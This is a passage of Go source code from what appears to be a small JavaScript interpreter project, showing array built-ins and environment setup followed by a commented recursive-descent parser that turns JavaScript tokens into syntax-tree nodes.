	IsNative   int                                        // 1 when NativeBody should be invoked instead of Body
	Callthis   int
	BindType   string
	BindOb     any
}

func (ob *FunctionDeclarationObject) Type() string {
	return token.FUNCTION
}

func (ob *FunctionDeclarationObject) ToString() string {
	return token.FUNCTION
}

// ReturnStatementObject carries a function's return value up through the
// evaluator until the enclosing call unwraps it.
type ReturnStatementObject struct {
	Value Object
}

// new_Func wraps a native Go implementation in a callable function object.
func new_Func(ddd *func(*FunctionDeclarationObject) Object) Object {
	d := &FunctionDeclarationObject{IsNative: 1, NativeBody: ddd}
	return d
}

func (ob *ReturnStatementObject) Type() string {
	return token.RETURN
}

func (ob *ReturnStatementObject) ToString() string {
	return token.RETURN
}
// array_push appends every argument to the receiver array and returns the
// new length, mirroring JavaScript's Array.prototype.push.
func array_push(myfun *FunctionDeclarationObject) Object {
	arr := myfun.Env
	for _, item := range myfun.Args {
		arr.Value = append(arr.Value, item)
	}
	return &NumericObject{Value: float64(len(arr.Value))}
}

// array_pop removes and returns the last element; popping an empty array
// yields a zero-valued NumericObject.
func array_pop(myfun *FunctionDeclarationObject) Object {
	arr := myfun.Env
	n := len(arr.Value)
	if n == 0 {
		return &NumericObject{}
	}
	last := arr.Value[n-1]
	arr.Value = arr.Value[:n-1]
	return *last
}

// array_join stringifies every element and joins them with the separator
// given as the first argument, mirroring Array.prototype.join.
func array_join(myfun *FunctionDeclarationObject) Object {
	arr := myfun.Env
	sep := (*myfun.Args[0]).(*StringObject).Value
	parts := []string{}
	for _, el := range arr.Value {
		parts = append(parts, (*el).ToString())
	}
	return &StringObject{
		Value: strings.Join(parts, sep),
	}
}
// NewArray builds an array environment pre-populated with the push/pop/join
// built-ins (JION mirrors the token package's spelling of "join").
func NewArray() Environment {
	env := NewEnv(nil)
	env.TypeInfo = token.ArrayE
	env.Value = make([]*Object, 0)
	push := array_push
	env.Store.Set(token.PUSH, new_Func(&push))
	pop := array_pop
	env.Store.Set(token.POP, new_Func(&pop))
	join := array_join
	env.Store.Set(token.JION, new_Func(&join))
	return *env
}

// NewObject builds an empty object environment.
func NewObject() Environment {
	env := NewEnv(nil)
	env.TypeInfo = token.Object
	return *env
}

// NewEnv creates a scope whose lookups fall back to the outer scope eg.
func NewEnv(eg *Environment) *Environment {
	return &Environment{Store: NewSafeMap(), Outer: eg, TypeInfo: token.ENV}
}
|
2833844911/gojsvmp | 24,772 | parse/parse_new.go | package parse
import (
"fmt"
"myvmp/ast"
"myvmp/token"
"os"
"strconv"
)
// allDtInfo is the parser's cursor over the token stream.
type allDtInfo struct {
	Start    int                // index of the next token to consume
	ShangOne ast.Statement      // most recently parsed expression (pending left operand)
	Alldtd   []*token.TokenType // the full token list
}

// getDt consumes and returns the current token, advancing the cursor.
func (oo *allDtInfo) getDt() *token.TokenType {
	v := oo.Alldtd[oo.Start]
	oo.Start++
	return v
}

// getNextkey peeks at the current token without consuming it.
func (oo *allDtInfo) getNextkey() *token.TokenType {
	return oo.Alldtd[oo.Start]
}

// newdt wraps a token slice in a fresh parser cursor.
func newdt(vhh []*token.TokenType) *allDtInfo {
	return &allDtInfo{Start: 0, Alldtd: vhh}
}

// isover reports whether the cursor has run past the last token.
func (oo *allDtInfo) isover() bool {
	// idiomatic: return the comparison directly instead of if/return true/false
	return oo.Start >= len(oo.Alldtd)
}
// parseBinaryExpression builds a binary-expression node for operator opert,
// with alldata.ShangOne as the left operand and the next parsed expression as
// the right. Precedence is compared via the tokens' PAXU field: when the
// upcoming operator binds at least as tightly (and is not a terminator,
// bracket, comma, || or &&), parsing recurses to the right; otherwise the
// node is closed here. NOTE: mutates the shared cursor state (ShangOne/Start)
// in a precise order — do not reorder statements.
func parseBinaryExpression(alldata *allDtInfo, opert *token.TokenType) ast.Statement {
	huu := alldata.ShangOne
	alldata.ShangOne = nil
	Right := parseData(alldata)
	alldata.ShangOne = huu
	hds := alldata.getNextkey()
	if opert.PAXU <= hds.PAXU && alldata.getNextkey().TypeInfo != token.OVER && alldata.getNextkey().TypeInfo != token.YOUOK && alldata.getNextkey().TypeInfo != token.ZUOZ && alldata.getNextkey().TypeInfo != token.DH && alldata.getNextkey().TypeInfo != token.HUOHUO && alldata.getNextkey().TypeInfo != token.YUYU {
		// the next operator binds tighter: make Right the pending operand and
		// recurse so it becomes the left side of the deeper expression
		aldt := &ast.BinaryExpression{Left: alldata.ShangOne}
		aldt.Operator = opert.TypeInfo
		alldata.ShangOne = Right
		mytkdd := alldata.getDt()
		Left := parseBinaryExpression(alldata, mytkdd)
		aldt.Right = Left
		return aldt
	} else {
		// close this node; if the expression continues, keep parsing with the
		// finished node as the pending left operand
		aldt := &ast.BinaryExpression{Left: alldata.ShangOne}
		aldt.Operator = opert.TypeInfo
		aldt.Right = Right
		alldata.ShangOne = aldt
		if alldata.getNextkey().TypeInfo == token.OVER || alldata.getNextkey().TypeInfo == token.YOUOK || alldata.getNextkey().TypeInfo == token.ZUOZ || alldata.getNextkey().TypeInfo == token.DH || alldata.getNextkey().TypeInfo == token.YUYU || alldata.getNextkey().TypeInfo == token.HUOHUO {
			sseee := alldata.ShangOne
			return sseee
		}
		hu := parseData(alldata)
		var dsadasd ast.Statement
		if hu == nil {
			dsadasd = aldt
		} else {
			dsadasd = hu
		}
		return dsadasd
	}
}
// parseYpuxianKuoHao parses a parenthesized expression "(...)" up to the
// closing ")" (token.YOUOK), then handles whatever immediately follows it:
// a call "(", member access "." or "[", or an assignment operator
// (=, +=, -=). The loop keeps feeding parsed sub-expressions back through
// ShangOne until the ")" is reached.
func parseYpuxianKuoHao(alldata *allDtInfo) ast.Statement {
	alldata.ShangOne = nil
	for {
		dtt := parseData(alldata)
		if alldata.getNextkey().TypeInfo == token.YOUOK {
			alldata.Start++
			zbrt := dtt
			alldata.ShangOne = dtt
			var dtife ast.Statement
			var dtif ast.Statement
			dtife = zbrt
			// postfix continuations after ")": call / .member / [index] / assignment
			if alldata.getNextkey().TypeInfo == token.ZHUOK {
				alldata.ShangOne = dtife
				alldata.Start++
				dtif = parseCallE(alldata)
			} else if alldata.getNextkey().TypeInfo == token.Dian {
				alldata.ShangOne = dtife
				alldata.Start++
				dtif = parseMemberExpression(alldata, false)
			} else if alldata.getNextkey().TypeInfo == token.YOUZ {
				alldata.ShangOne = dtife
				alldata.Start++
				dtif = parseMemberExpression(alldata, true)
			} else if alldata.getNextkey().TypeInfo == token.DENYU {
				alldata.ShangOne = nil
				alldata.Start++
				dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
				dds := parseAss(alldata)
				dshhh.Right = dds
				dtif = dshhh
			} else if alldata.getNextkey().TypeInfo == token.JIADEN {
				alldata.ShangOne = nil
				alldata.Start++
				dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
				dds := parseAss(alldata)
				dshhh.Right = dds
				return dshhh
			} else if alldata.getNextkey().TypeInfo == token.JANDEN {
				alldata.ShangOne = nil
				alldata.Start++
				dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
				dds := parseAss(alldata)
				dshhh.Right = dds
				return dshhh
			} else {
				dtif = dtife
			}
			alldata.ShangOne = dtif
			//huff := parseBin(alldata)
			//if huff == nil {
			//	dtif = dtif
			//} else {
			//	dtif = huff
			//}
			return dtif
		}
		alldata.ShangOne = dtt
	}
}
// parseCallE parses a call's argument list after the "(" has been consumed,
// using the pending ShangOne expression as the callee. Arguments are parsed
// until ")" (token.YOUOK), separated by commas (token.DH). After the call it
// chains any postfix continuation: another call, .member, [index], or an
// assignment operator targeting the call result.
func parseCallE(alldata *allDtInfo) ast.Statement {
	caleer := alldata.ShangOne
	alldata.ShangOne = nil
	Calle := &ast.CallExpression{Caller: caleer, Arguments: make([]*ast.Statement, 0)}
	if alldata.getNextkey().TypeInfo != token.YOUOK {
		for {
			dtt := parseData(alldata)
			if alldata.getNextkey().TypeInfo == token.DH {
				alldata.Start++
				kp := dtt
				Calle.Arguments = append(Calle.Arguments, &kp)
				alldata.ShangOne = nil
				continue
			}
			if alldata.getNextkey().TypeInfo == token.YOUOK {
				alldata.Start++
				kp := dtt
				alldata.ShangOne = nil
				Calle.Arguments = append(Calle.Arguments, &kp)
				break
			}
			alldata.ShangOne = dtt
		}
	} else {
		// empty argument list: just consume ")"
		alldata.Start++
	}
	//alldata.ShangOne = Calle
	dtife := Calle
	var dtif ast.Statement
	// postfix continuations after the call: f()(...) / f().x / f()[i] / f() = ...
	if alldata.getNextkey().TypeInfo == token.ZHUOK {
		alldata.ShangOne = dtife
		alldata.Start++
		dtif = parseCallE(alldata)
	} else if alldata.getNextkey().TypeInfo == token.Dian {
		alldata.ShangOne = dtife
		alldata.Start++
		dtif = parseMemberExpression(alldata, false)
	} else if alldata.getNextkey().TypeInfo == token.YOUZ {
		alldata.ShangOne = dtife
		alldata.Start++
		dtif = parseMemberExpression(alldata, true)
	} else if alldata.getNextkey().TypeInfo == token.DENYU {
		alldata.ShangOne = nil
		alldata.Start++
		dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
		dds := parseAss(alldata)
		dshhh.Right = dds
		dtif = dshhh
	} else if alldata.getNextkey().TypeInfo == token.JIADEN {
		alldata.ShangOne = nil
		alldata.Start++
		dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
		dds := parseAss(alldata)
		dshhh.Right = dds
		return dshhh
	} else if alldata.getNextkey().TypeInfo == token.JANDEN {
		alldata.ShangOne = nil
		alldata.Start++
		dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
		dds := parseAss(alldata)
		dshhh.Right = dds
		return dshhh
	} else {
		dtif = dtife
	}
	alldata.ShangOne = dtif
	//hu := parseBin(alldata)
	//if hu == nil {
	//	dtif = dtif
	//} else {
	//	dtif = hu
	//}
	return dtif
}
// parseNEW parses `new Callee(args...)`: it parses the following expression
// and repackages it as a NewExpression.
// NOTE(review): the type assertion panics if the expression after `new` is
// not a call expression (e.g. `new Foo` without parentheses) — confirm that
// the lexer/evaluator never produces that shape, or guard with `, ok`.
func parseNEW(alldata *allDtInfo) ast.Statement {
	caleer := parseData(alldata)
	dasd := caleer.(*ast.CallExpression)
	alldata.ShangOne = nil
	Calle := &ast.NewExpression{Callee: dasd.Caller, Arguments: dasd.Arguments}
	return Calle
}
// parseMemberExpression builds a member access on the pending ShangOne
// expression. When computed is false the property is the next identifier
// token ("obj.name"); when true it is a full expression up to "]"
// ("obj[expr]"). It then chains further continuations: call "(", assignment
// operators, or additional "."/"[" accesses (handled by recursing).
func parseMemberExpression(alldata *allDtInfo, computed bool) ast.Statement {
	allh := ast.MemberExpression{Object: alldata.ShangOne}
	if computed == false {
		// dot access: the property is a literal name
		dtt := alldata.getDt()
		allh.Property = &ast.StringLiteral{Value: dtt.Value}
	} else {
		// bracket access: parse an index expression terminated by "]"
		dtt := overDD(alldata)
		alldata.Start++
		allh.Property = dtt
	}
	alldata.ShangOne = &allh
	if alldata.getNextkey().TypeInfo == token.ZHUOK {
		alldata.Start++
		dtif := parseCallE(alldata)
		return dtif
	} else if alldata.getNextkey().TypeInfo == token.DENYU {
		alldata.ShangOne = nil
		alldata.Start++
		dshhh := &ast.AssignmentExpression{Left: &allh, Operator: token.DENYU}
		dds := parseAss(alldata)
		dshhh.Right = dds
		return dshhh
	} else if alldata.getNextkey().TypeInfo == token.JIADEN {
		alldata.ShangOne = nil
		alldata.Start++
		dshhh := &ast.AssignmentExpression{Left: &allh, Operator: token.JIADEN}
		dds := parseAss(alldata)
		dshhh.Right = dds
		return dshhh
	} else if alldata.getNextkey().TypeInfo == token.JANDEN {
		alldata.ShangOne = nil
		alldata.Start++
		dshhh := &ast.AssignmentExpression{Left: &allh, Operator: token.JANDEN}
		dds := parseAss(alldata)
		dshhh.Right = dds
		return dshhh
	}
	if alldata.getNextkey().TypeInfo != token.Dian && alldata.getNextkey().TypeInfo != token.YOUZ {
		alldata.ShangOne = &allh
		//hu := parseBin(alldata)
		//var dsadasd ast.Statement
		//if hu == nil {
		//	dsadasd = &allh
		//} else {
		//	dsadasd = hu
		//}
		dsadasd := &allh
		return dsadasd
	}
	// chained access: a.b.c or a.b[c]
	if alldata.getNextkey().TypeInfo == token.Dian {
		alldata.Start++
		return parseMemberExpression(alldata, false)
	} else {
		alldata.Start++
		return parseMemberExpression(alldata, true)
	}
}
// parseBlack parses statements until the closing "}" (token.ZUOKH) and
// returns them as a BlockStatement; bare ";" statements are skipped.
func parseBlack(alldata *allDtInfo) ast.Statement {
	block := &ast.BlockStatement{Body: []*ast.Statement{}}
	for {
		stmt := parseData(alldata)
		if stmt.StatementNode() == token.ZUOKH {
			// closing brace terminates the block
			break
		}
		alldata.ShangOne = nil
		if stmt.StatementNode() == token.OVER {
			// stray semicolon — nothing to record
			continue
		}
		entry := stmt
		block.Body = append(block.Body, &entry)
	}
	alldata.ShangOne = nil
	return block
}
// parseIf parses `if (test) { ... } [else ...]`. The condition is parsed up
// to ")" (token.YOUOK); the else-branch may be another block or a single
// statement (which covers `else if`).
func parseIf(alldata *allDtInfo) ast.Statement {
	alldata.Start++
	for {
		dtt := parseData(alldata)
		alldata.ShangOne = dtt
		if alldata.getNextkey().TypeInfo == token.YOUOK {
			//alldata.ShangOne = nil
			alldata.Start++
			break
		}
		if alldata.isover() {
			// ran off the token stream before the condition's closing ")"
			fmt.Println("缺少 ')'")
			return nil
		}
	}
	test := alldata.ShangOne
	alldata.ShangOne = nil
	dtt := ast.IfStatement{Test: test}
	alldata.Start++ // presumably skips the "{" of the then-branch — confirm against lexer output
	Cope := parseBlack(alldata)
	dtt.Consequent = Cope
	if alldata.getNextkey().TypeInfo == token.ELSE {
		alldata.Start++
		if alldata.getNextkey().TypeInfo == token.YOUKH {
			// else { ... }
			alldata.Start++
			dtt.Alternate = parseBlack(alldata)
		} else {
			// else <single statement>, including `else if`
			dtt.Alternate = parseData(alldata)
		}
	}
	return &dtt
}
// parseForIn finishes a `for (x in obj) { ... }` loop whose left-hand side
// has already been parsed by the caller.
func parseForIn(alldata *allDtInfo, intt ast.Statement) ast.Statement {
	node := &ast.ForInStatement{
		Left: intt,
	}
	for {
		expr := parseData(alldata)
		alldata.ShangOne = expr
		if alldata.getNextkey().TypeInfo == token.YOUOK {
			// ")" closes the loop header
			node.Right = expr
			alldata.Start++
			break
		}
	}
	alldata.Start++
	node.Body = parseBlack(alldata)
	return node
}
// parseFor parses a C-style `for (init; test; update) { ... }` loop. Each of
// the three header clauses may be empty. If the token after the first clause
// is `in`, parsing is delegated to parseForIn instead.
func parseFor(alldata *allDtInfo) ast.Statement {
	alldata.Start++
	alldata.ShangOne = nil
	dat := &ast.ForStatement{}
	// init clause (up to the first ";"), or for-in detection
	if alldata.getNextkey().TypeInfo == token.OVER {
	} else {
		for {
			dtt := parseData(alldata)
			alldata.ShangOne = dtt
			if alldata.getNextkey().TypeInfo == token.OVER {
				dat.Init = dtt
				alldata.Start++
				break
			} else if alldata.getNextkey().TypeInfo == token.IN {
				alldata.Start++
				return parseForIn(alldata, dtt)
			}
		}
	}
	// test clause (up to the second ";")
	if alldata.getNextkey().TypeInfo == token.OVER {
		alldata.Start++
	} else {
		for {
			dtt := parseData(alldata)
			alldata.ShangOne = dtt
			if alldata.getNextkey().TypeInfo == token.OVER {
				dat.Test = dtt
				alldata.Start++
				break
			}
		}
	}
	// update clause (up to the closing ")")
	if alldata.getNextkey().TypeInfo == token.YOUOK {
		alldata.Start++
	} else {
		for {
			dtt := parseData(alldata)
			alldata.ShangOne = dtt
			if alldata.getNextkey().TypeInfo == token.YOUOK {
				dat.Updata = dtt
				alldata.Start++
				break
			}
		}
	}
	alldata.Start++ // presumably skips "{" — confirm against lexer output
	Cope := parseBlack(alldata)
	dat.Body = Cope
	alldata.ShangOne = nil
	return dat
}
// parseAss parses the right-hand side of an assignment, stopping (without
// consuming the terminator) at ";", ")" or "}".
func parseAss(alldata *allDtInfo) ast.Statement {
	for {
		expr := parseData(alldata)
		alldata.ShangOne = expr
		switch alldata.getNextkey().TypeInfo {
		case token.OVER, token.YOUOK, token.ZUOKH:
			alldata.ShangOne = nil
			return expr
		}
	}
}
// parseFunParams parses a function's parameter list after the "(" has been
// consumed: expressions separated by "," (token.DH) up to ")" (token.YOUOK).
// An immediate ")" yields an empty list.
func parseFunParams(alldata *allDtInfo) []*ast.Statement {
	params := make([]*ast.Statement, 0)
	if alldata.getNextkey().TypeInfo != token.YOUOK {
		for {
			dtt := parseData(alldata)
			if alldata.getNextkey().TypeInfo == token.DH {
				alldata.Start++
				kp := dtt
				params = append(params, &kp)
				alldata.ShangOne = nil
				continue
			}
			if alldata.getNextkey().TypeInfo == token.YOUOK {
				alldata.Start++
				params = append(params, &dtt)
				alldata.ShangOne = nil
				break
			}
		}
	} else {
		alldata.Start++
	}
	return params
}

// parseFun parses a function after the `function` keyword. If "(" follows
// immediately the function is anonymous (FunctionExpression); otherwise the
// next token is its name (FunctionDeclaration). Both forms share the same
// parameter-list and body parsing, factored into parseFunParams.
func parseFun(alldata *allDtInfo) ast.Statement {
	if alldata.getNextkey().TypeInfo == token.ZHUOK {
		// anonymous: function (params) { body }
		dayy := &ast.FunctionExpression{}
		alldata.Start++
		dayy.Params = parseFunParams(alldata)
		alldata.Start++ // skip "{"
		dayy.Body = parseBlack(alldata)
		return dayy
	}
	// named: function name(params) { body }
	dayy := &ast.FunctionDeclaration{}
	dayy.Id = &ast.Identifier{Name: alldata.getDt().Value}
	alldata.Start++ // skip "("
	dayy.Params = parseFunParams(alldata)
	alldata.Start++ // skip "{"
	dayy.Body = parseBlack(alldata)
	return dayy
}
// parseVAR parses `var a, b, c [= init]`. Declared names are collected until
// "=" (token.DENYU), ";" (token.OVER) or `in` — the latter two end the
// declaration without an initializer (the `in` case feeds for-in headers).
// NOTE: all names share the single Init expression that follows "=".
func parseVAR(alldata *allDtInfo) ast.Statement {
	das := ast.VariableDeclaration{Declarations: make([]*ast.Statement, 0)}
	for {
		gu := alldata.getDt()
		dttw := ast.Identifier{Name: gu.Value}
		var dtt ast.Statement = &dttw
		das.Declarations = append(das.Declarations, &dtt)
		if alldata.getNextkey().TypeInfo == token.DH {
			alldata.Start++
			alldata.ShangOne = nil
			continue
		}
		if alldata.getNextkey().TypeInfo == token.DENYU {
			alldata.Start++
			alldata.ShangOne = nil
			break
		} else if alldata.getNextkey().TypeInfo == token.OVER {
			alldata.ShangOne = nil
			return &das
		} else if alldata.getNextkey().TypeInfo == token.IN {
			alldata.ShangOne = nil
			return &das
		}
	}
	das.Init = overYH(alldata)
	return &das
}
// overYH parses an initializer expression, stopping (without consuming) at
// ";", ")" or "}". A leading ";" is consumed and yields an empty OVER node.
func overYH(alldata *allDtInfo) ast.Statement {
	if alldata.getNextkey().TypeInfo == token.OVER {
		alldata.Start++
		alldata.ShangOne = nil
		return &ast.OVER{TypeInfo: token.OVER}
	}
	for {
		expr := parseData(alldata)
		alldata.ShangOne = expr
		switch alldata.getNextkey().TypeInfo {
		case token.OVER, token.YOUOK, token.ZUOKH:
			alldata.ShangOne = nil
			return expr
		}
	}
}
// overDD parses a computed-member index expression, stopping (without
// consuming) at "]" (token.ZUOZ). A leading ";" is consumed and yields an
// empty OVER node.
func overDD(alldata *allDtInfo) ast.Statement {
	if alldata.getNextkey().TypeInfo == token.OVER {
		alldata.Start++
		alldata.ShangOne = nil
		return &ast.OVER{TypeInfo: token.OVER}
	}
	for {
		expr := parseData(alldata)
		alldata.ShangOne = expr
		if alldata.getNextkey().TypeInfo == token.ZUOZ {
			alldata.ShangOne = nil
			return expr
		}
	}
}
// parseTRY parses `try { ... } catch [(err)] { ... }`. The catch parameter
// is optional; when present, two tokens are skipped after the identifier
// (presumably ")" and "{" — confirm against lexer output).
func parseTRY(alldata *allDtInfo) ast.Statement {
	das := ast.TryStatement{}
	alldata.Start++
	das.Block = parseBlack(alldata)
	alldata.Start++
	dasghj := ast.CatchClause{}
	if alldata.getNextkey().TypeInfo == token.ZHUOK {
		// catch (err) { ... }
		alldata.Start++
		dasd := alldata.getDt()
		bh := ast.Identifier{Name: dasd.Value}
		dasghj.Param = &bh
		alldata.Start++
		alldata.Start++
	} else {
		// catch { ... } — no bound error variable
		alldata.Start++
	}
	dasghj.Body = parseBlack(alldata)
	das.Handler = &dasghj
	alldata.ShangOne = nil
	return &das
}
// parseUnary builds a prefix unary expression (typeof, !) whose operand is
// the next parsed expression.
func parseUnary(alldata *allDtInfo, sdqm token.TokenType) ast.Statement {
	node := ast.UnaryExpression{Operator: sdqm.Value, Argument: parseData(alldata)}
	return &node
}
// parseArray parses an array literal after "[" has been consumed: elements
// separated by "," (token.DH) up to "]" (token.ZUOZ). It then chains an
// immediate member access ("." or "[") on the literal if one follows.
func parseArray(alldata *allDtInfo) ast.Statement {
	das := ast.ArrayExpression{Elements: make([]*ast.Statement, 0)}
	if alldata.getNextkey().TypeInfo != token.ZUOZ {
		for {
			dtt := parseData(alldata)
			if alldata.getNextkey().TypeInfo == token.DH {
				alldata.Start++
				kp := dtt
				das.Elements = append(das.Elements, &kp)
				alldata.ShangOne = nil
				continue
			}
			if alldata.getNextkey().TypeInfo == token.ZUOZ {
				alldata.Start++
				kp := dtt
				das.Elements = append(das.Elements, &kp)
				break
			}
		}
	} else {
		// empty literal "[]": just consume "]"
		alldata.Start++
	}
	if alldata.getNextkey().TypeInfo != token.Dian && alldata.getNextkey().TypeInfo != token.YOUZ {
		//hu := parseBin(alldata)
		//var dsadasd ast.Statement
		//if hu == nil {
		//	dsadasd = &allh
		//} else {
		//	dsadasd = hu
		//}
		dsadasd := &das
		return dsadasd
	}
	// immediate member access on the literal: [1,2].length / [1,2][0]
	if alldata.getNextkey().TypeInfo == token.Dian {
		alldata.Start++
		alldata.ShangOne = &das
		return parseMemberExpression(alldata, false)
	} else {
		alldata.Start++
		alldata.ShangOne = &das
		return parseMemberExpression(alldata, true)
	}
}
// parseObject parses an object literal after "{" has been consumed:
// key/value pairs (the ":" token is skipped via Start++ after each key)
// separated by "," up to "}" (token.ZUOKH). dsfhc buffers the last pair so
// it is still recorded when the loop exits via a bare "}" statement node.
func parseObject(alldata *allDtInfo) ast.Statement {
	das := ast.ObjectExpression{Properties: make([]*ast.Statement, 0)}
	var dsfhc ast.Statement
	if alldata.getNextkey().TypeInfo != token.ZUOKH {
		for {
			jklads := ast.Property{}
			dtt := parseData(alldata)
			if dtt.StatementNode() == token.OVER {
				continue
			}
			if dtt.StatementNode() == token.ZUOKH {
				// closing brace reached via a parsed statement: flush the
				// buffered pair, if any
				if dsfhc != nil {
					das.Properties = append(das.Properties, &dsfhc)
				}
				break
			}
			alldata.Start++ // skip ":" between key and value
			jklads.Key = dtt
			value := parseData(alldata)
			jklads.Value = value
			var dsf ast.Statement = &jklads
			dsfhc = dsf
			if alldata.getNextkey().TypeInfo == token.DH {
				alldata.Start++
				das.Properties = append(das.Properties, &dsf)
				dsfhc = nil
				alldata.ShangOne = nil
				continue
			}
			if alldata.getNextkey().TypeInfo == token.ZUOKH {
				alldata.Start++
				das.Properties = append(das.Properties, &dsf)
				break
			}
		}
	} else {
		// empty literal "{}": just consume "}"
		alldata.Start++
	}
	return &das
}
// parseRet parses the expression following a `return` keyword.
func parseRet(alldata *allDtInfo) ast.Statement {
	node := ast.ReturnStatement{Argument: parseData(alldata)}
	return &node
}
// parseUpdate builds a ++/-- update expression around the pending ShangOne
// operand; ty records whether the operator appeared in prefix position.
func parseUpdate(alldata *allDtInfo, opert *token.TokenType, ty bool) ast.Statement {
	operand := alldata.ShangOne
	node := ast.UnaryExpression{Argument: operand, Operator: opert.Value, Prefix: ty}
	// keep the finished node as the pending operand for the caller
	alldata.ShangOne = &node
	return &node
}
// parseBin dispatches an operator token to the matching expression parser.
// All ordinary binary operators share one grouped case; only unary minus
// (SDD), DXIAND (which consumes an extra token first) and the postfix
// update operators need special handling. Unknown operators are a fatal
// syntax error.
func parseBin(alldata *allDtInfo, mytk *token.TokenType) ast.Statement {
	switch mytk.TypeInfo {
	case token.SDD:
		// unary minus with no pending left operand: treat "-x" as "0 - x"
		if alldata.ShangOne == nil {
			dsdh := &ast.NumericLiteral{Value: 0}
			var dsdoooo ast.Statement = dsdh
			alldata.ShangOne = dsdoooo
		}
		return parseBinaryExpression(alldata, mytk)
	case token.DXIAND:
		// consumes one extra token before parsing the binary expression
		alldata.Start++
		return parseBinaryExpression(alldata, mytk)
	case token.ADD, token.CHEN, token.CHU, token.XIAND, token.YIHUO, token.HUO,
		token.HUOHUO, token.YU, token.YUYU, token.QUYU,
		token.XIAOYH, token.XIAOYHYH, token.XIAOYHYHYH, token.XIAOYHDY,
		token.DAYH, token.DAYHDY, token.DAYHYH, token.DAYHYHYU,
		token.BUDY, token.BUDYDY, token.KAIFAN:
		// every plain binary operator is parsed identically
		return parseBinaryExpression(alldata, mytk)
	case token.UPADD, token.UPASD:
		// postfix ++ / --
		return parseUpdate(alldata, mytk, false)
	default:
		fmt.Println("js 语法错误", mytk.Value)
		os.Exit(0)
		// unreachable after os.Exit; the original dead `alldata.Start--` was removed
		return nil
	}
}
// parseData consumes the next token from alldata and parses exactly one AST
// statement/expression node. It is the central dispatch of the recursive
// descent parser: every construct (if/for/try, literals, identifiers,
// assignments, member access, calls, ...) starts here. alldata.ShangOne
// carries the previously parsed expression so postfix operators and chained
// member/call expressions can attach to it.
func parseData(alldata *allDtInfo) ast.Statement {
	mytk := alldata.getDt()
	var dtif ast.Statement
	switch mytk.TypeInfo {
	case token.IF:
		dtif = parseIf(alldata)
	case token.YOUKH:
		// "{" in statement position: object literal.
		dtif = parseObject(alldata)
	case token.TYPEOF:
		dtif = parseUnary(alldata, *mytk)
	//case token.SDD:
	//	dtif = parseUnary(alldata, *mytk)
	case token.UPADD:
		// "++": prefix when nothing has been parsed yet (ShangOne is nil),
		// otherwise postfix on the previously parsed expression.
		if alldata.ShangOne == nil {
			alldata.ShangOne = parseData(alldata)
			dtif = parseUpdate(alldata, mytk, true)
		} else {
			dsada := alldata.ShangOne
			dtif = &ast.UnaryExpression{Argument: dsada, Operator: mytk.TypeInfo, Prefix: false}
		}
	case token.UPASD:
		// "--": same prefix/postfix split as UPADD above.
		if alldata.ShangOne == nil {
			alldata.ShangOne = parseData(alldata)
			dtif = parseUpdate(alldata, mytk, true)
		} else {
			dsada := alldata.ShangOne
			dtif = &ast.UnaryExpression{Argument: dsada, Operator: mytk.TypeInfo, Prefix: false}
		}
	case token.QUFAN:
		// "!" logical negation.
		dtif = parseUnary(alldata, *mytk)
	case token.FOR:
		dtif = parseFor(alldata)
	case token.TRY:
		dtif = parseTRY(alldata)
	case token.NEW:
		dtif = parseNEW(alldata)
	case token.RETURN:
		dtif = parseRet(alldata)
	case token.VAR:
		dtif = parseVAR(alldata)
	case token.Debug:
		dtif = &ast.DebugStatement{}
	case token.INT:
		// Numeric literal; parse errors are deliberately ignored here
		// (lexer already vetted the token text).
		zf, _ := strconv.ParseFloat(mytk.Value, 64)
		dtif = &ast.NumericLiteral{Value: zf}
		alldata.ShangOne = dtif
		//hu := parseBin(alldata)
		//if hu == nil {
		//	dtif = dtif
		//} else {
		//	dtif = hu
		//}
	case token.NULL:
		dtif = &ast.NullIdentifier{}
		alldata.ShangOne = dtif
		//hu := parseBin(alldata)
		//if hu == nil {
		//	dtif = dtif
		//} else {
		//	dtif = hu
		//}
	case token.Str:
		// String literal. Peek one token ahead to decide whether it starts a
		// call, member access, index access, or an assignment target.
		dtifed := &ast.StringLiteral{Value: mytk.Value}
		var dtife ast.Statement = dtifed
		if alldata.getNextkey().TypeInfo == token.ZHUOK {
			alldata.ShangOne = dtife
			alldata.Start++
			dtif = parseCallE(alldata)
		} else if alldata.getNextkey().TypeInfo == token.Dian {
			alldata.ShangOne = dtife
			alldata.Start++
			dtif = parseMemberExpression(alldata, false)
		} else if alldata.getNextkey().TypeInfo == token.YOUZ {
			alldata.ShangOne = dtife
			alldata.Start++
			dtif = parseMemberExpression(alldata, true)
		} else if alldata.getNextkey().TypeInfo == token.DENYU {
			alldata.ShangOne = nil
			alldata.Start++
			dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.DENYU}
			dds := parseAss(alldata)
			dshhh.Right = dds
			dtif = dshhh
		} else if alldata.getNextkey().TypeInfo == token.JIADEN {
			alldata.ShangOne = nil
			alldata.Start++
			dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JIADEN}
			dds := parseAss(alldata)
			dshhh.Right = dds
			return dshhh
		} else if alldata.getNextkey().TypeInfo == token.JANDEN {
			alldata.ShangOne = nil
			alldata.Start++
			dshhh := &ast.AssignmentExpression{Left: dtife, Operator: token.JANDEN}
			dds := parseAss(alldata)
			dshhh.Right = dds
			return dshhh
		} else {
			alldata.ShangOne = dtife
			//hu := parseBin(alldata)
			//if hu == nil {
			//	dtif = dtife
			//} else {
			//	dtif = hu
			//}
			dtif = dtife
		}
	case token.THIS:
		fallthrough
	case token.IDENT:
		// `this` and plain identifiers share the same lookahead logic as
		// string literals above (call / member / index / assignment).
		var dtife ast.Statement
		if mytk.TypeInfo == token.THIS {
			dtife = &ast.ThisExpression{}
		} else {
			dtife = &ast.Identifier{Name: mytk.Value}
		}
		if alldata.getNextkey().TypeInfo == token.ZHUOK {
			alldata.ShangOne = dtife
			alldata.Start++
			dtif = parseCallE(alldata)
		} else if alldata.getNextkey().TypeInfo == token.Dian {
			alldata.ShangOne = dtife
			alldata.Start++
			dtif = parseMemberExpression(alldata, false)
		} else if alldata.getNextkey().TypeInfo == token.YOUZ {
			alldata.ShangOne = dtife
			alldata.Start++
			dtif = parseMemberExpression(alldata, true)
		} else if alldata.getNextkey().TypeInfo == token.DENYU {
			alldata.ShangOne = nil
			alldata.Start++
